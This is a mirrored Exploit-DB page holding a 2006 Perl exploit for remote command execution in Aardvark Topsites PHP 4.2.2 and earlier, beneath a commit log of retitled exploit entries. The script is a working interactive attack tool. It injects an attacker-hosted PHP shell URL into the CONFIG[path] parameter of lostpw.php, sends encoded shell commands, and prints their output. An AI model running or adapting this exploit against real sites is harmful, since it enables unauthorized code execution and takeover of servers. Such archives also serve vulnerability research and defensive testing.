bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/1732.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

94 lines
2.4 KiB
Perl
Executable file
Raw Blame History

#!/usr/bin/perl
#
# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$
#
# to set your PHP shell location:
# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd=
# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='
# cijfer$
#
# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $
use strict;
use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;
my($command,$verbose,$proxy,$shell,$host,$res);
$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
&usage unless $host;
while()
{
print color("green"), "cijfer\# ", color("reset");
chomp($command = <STDIN>);
exit unless $command;
if($command =~ m/^http:\/\/(.*)/g)
{
$host="http://".$1;
print "host changed to '";
print color("bold"), $host."'\n", color("reset");
}
elsif($command =~ m/^shell=http:\/\/(.*)/g)
{
$shell="http://".$1;
print "php shell set to '";
print color("bold"), $shell."'\n", color("reset");
}
else
{
&exploit($command,$host);
}
}
sub usage
{
print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n";
print "usage: $0 -hpv\n\n";
print " -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n";
print " -p, --proxy\t\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
print " -v, --verbose\t\tverbose mode (debug)\n\n";
exit;
}
sub exploit
{
my($command,$host) = @_;
my($string,$execut,$recv,$sent,$out,$cij,@cij);
$cij=LWP::UserAgent->new() or die;
$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
$cij->proxy("http", "http://".$proxy."/") unless !$proxy;
$string = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20";
$string .= uri_escape(shift);
$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";
$out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string);
if($out->is_success)
{
@cij=split("_cijfer_",$out->content);
print substr(@cij[1],1);
}
if($verbose)
{
$recv=length $out->content;
print "Total received bytes: ".$recv."\n";
$sent=length $command;
print "Total sent bytes: ".$sent."\n";
}
}
# milw0rm.com [2006-04-30]
Reference in a new issue View git blame Copy permalink